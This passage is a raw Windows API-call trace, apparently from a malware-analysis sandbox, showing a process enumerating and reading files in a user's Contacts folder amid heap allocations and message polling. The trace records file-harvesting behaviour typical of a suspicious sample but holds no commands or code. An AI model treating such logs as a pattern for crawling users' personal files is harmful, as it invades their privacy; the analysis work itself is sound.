lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.083] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.083] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.083] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Contacts", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0157.083] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.083] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.083] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.083] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.083] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9675d20, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9675d20, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90ae58 [0157.086] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9675d20, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9675d20, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.086] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0157.086] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d50 [0157.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d50 [0157.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.088] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc95914e0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc95914e0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9603900, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x10b20, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="Administrator.flyingship.contact", cAlternateFileName="ADMINI~2.CON")) returned 1 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.089] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x9091f8 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x130) returned 0x8e7858 [0157.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9091f8 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x230) returned 0x8e7990 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909310 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7858 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.090] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.090] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.090] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.090] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.091] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1da0 [0157.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba708 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba708 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d80 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6c0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.093] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba6d8 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d70 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.093] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d70 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d80 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d80 | out: hHeap=0x8a0000) returned 1 [0157.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d70 | out: 